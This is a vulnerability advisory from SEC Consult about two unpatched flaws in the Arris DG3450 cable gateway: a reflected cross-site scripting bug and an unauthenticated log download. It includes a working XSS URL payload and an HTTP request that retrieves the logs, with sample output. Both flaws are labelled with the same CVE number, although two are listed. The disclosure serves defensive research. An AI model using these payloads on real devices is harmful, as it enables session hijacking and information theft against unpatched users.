Advertisement
SEC Consult Vulnerability Lab Security Advisory < 20230306-0 > ======================================================================= title: Multiple Vulnerabilities product: Arris DG3450 Cable Gateway vulnerable version: AR01.02.056.18_041520_711.NCS.10 fixed version: - CVE number: CVE-2023-27571, CVE-2023-27572 impact: medium homepage: https://www.commscope.com found: 2022-10-21 by: S. Robertz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- Arris has been aquired by CommScope in 2019. "At CommScope we push the boundaries of communications technology to create the worlds most advanced networks. We design, manufacture, install and support the hardware infrastructure and software intelligence that enable our digital society to interact and thrive. Working with customers, we advance broadband, enterprise and wireless networks to power progress and create lasting connections. Across the globe, our people and solutions are redefining connectivity, solving todays challenges and driving the innovation that will meet the needs of whats next." Source: https://www.commscope.com/about-us/ Business recommendation: ------------------------ The vendor did not reply to any of our communication attempts. The security issues have not been fixed. Users of this product are urged to contact their support representative and request the vulnerabilities to be fixed. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Reflected Cross-Site-Scripting Vulnerability (CVE-2023-27572) An attacker can execute arbitrary JavaScript code in the context of the victim's session, thus perform all actions, exfiltrate information, etc. In order to exploit this vulnerability the attacker will have to trick the user into visiting a manipulated URL. 2) Missing Authentication (CVE-2023-27572) Logfiles can be downloaded without prior authentication, once the correct URL is known. This allows an attacker to gain further information about the usage of the device. Proof of concept: ----------------- 1) Reflected Cross-Site-Scripting Vulnerability (CVE-2023-27572) The following URL has to be visited by the victim in order to execute arbitrary JavaScript code. http://$IP/https_redirect.php?page=%22;alert(document.domain);var%20dummy=%22 2) Missing Authentication (CVE-2023-27572) The following HTTP request will return the log file of the device without checking for a valid session cookie. ------------------- GET /troubleshooting_logs_download.php?log_type=system&time_frame=today HTTP/1.1 Host: $IP HTTP/1.1 200 OK X-Content-Type-Options: nosniff Set-Cookie: PHPSESSID=38b5a65ba1a4477e29efd73ee1e01554; path=/; HttpOnly X-XSS-Protection: 1; mode=block strict-transport-security: max-age=600; includeSubDomains Server: ARRIS Server X-Frame-Options: DENY Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'; worker-src blob: Cache-control: private Pragma: private Expires: 0 Content-type: text/plain;charset=utf-8 Content-Disposition: attachment; filename="troubleshooting_logs_system_today.txt" Content-Transfer-Encoding: binary Accept-Ranges: bytes Content-Length: 437 Date: Tue, 21 Jun 2022 20:51:07 GMT GUI: User:admin login 06/15/2022 22:46:56Notice GUI: User:admin logout 06/15/2022 22:42:14Notice GUI: User:admin logout 06/15/2022 22:41:26Notice GUI: User:admin logout 06/15/2022 22:41:06Notice GUI: User:admin logout 06/15/2022 22:40:47Notice GUI: User:admin login 06/15/2022 22:33:22Notice GUI: User:admin logout 06/15/2022 22:31:51Notice ------------------- Vulnerable / tested versions: ----------------------------- The vulnerabilities have been tested on the following device / firmware: * Arris DG3450 with software version AR01.02.056.18_041520_711.NCS.10 Vendor contact timeline: ------------------------ 2022-11-22: Contacting vendor through [email protected]; no response. 2022-12-05: Asking for security contact through @Arris Twitter social media No response. Received "You can no longer send messages to this person" after initial message. 2022-12-05: Contacting vendor via [email protected]; no response. 2023-01-24: Contacting vendor again via [email protected] and [email protected]; no response 2023-03-02: Requesting CVE numbers. 2023-03-06: Release of security advisory. Solution: --------- The vendor did not reply to any of our communication attempts. The security issues have not been fixed. Users of this product are urged to contact their support representative and request the vulnerabilities to be fixed. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Robertz / @2023
Copyright ©2023 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.